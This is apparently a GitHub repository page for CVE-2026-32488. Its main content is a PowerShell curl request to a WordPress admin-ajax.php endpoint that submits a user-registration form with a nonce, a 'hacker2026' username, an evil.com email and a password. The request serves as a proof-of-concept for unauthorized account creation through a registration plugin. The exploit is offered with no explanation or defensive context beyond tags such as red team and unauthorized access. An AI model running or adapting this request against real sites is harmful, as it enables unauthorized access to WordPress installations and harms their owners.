izxci/CVE-2026-32488

# CVE-2026-32488 CVE-2026-32488 # 将 Nonce 值赋给变量 $NONCE = "c82a4f80ba" curl.exe -s -X POST "http://localhost/wp-admin/admin-ajax.php" ` -d "action=user_registration_user_form_submit" ` -d "ur_frontend_form_nonce=$NONCE" ` -d "form_id=6" ` -d "form_data=[{`"field_name`":`"user_login`",`"value`":`"hacker2026`",`"field_type`":`"text`"},{`"field_name`":`"user_email`",`"value`":`"hacker2026@evil.com`",`"field_type`":`"email`"},{`"field_name`":`"user_pass`",`"value`":`"Hacker123!`",`"field_type`":`"password`"}]"

标签：AI合规, CISA项目, WordPress, 安全, 数据展示, 文件完整性监控, 未授权访问, 红队, 超时处理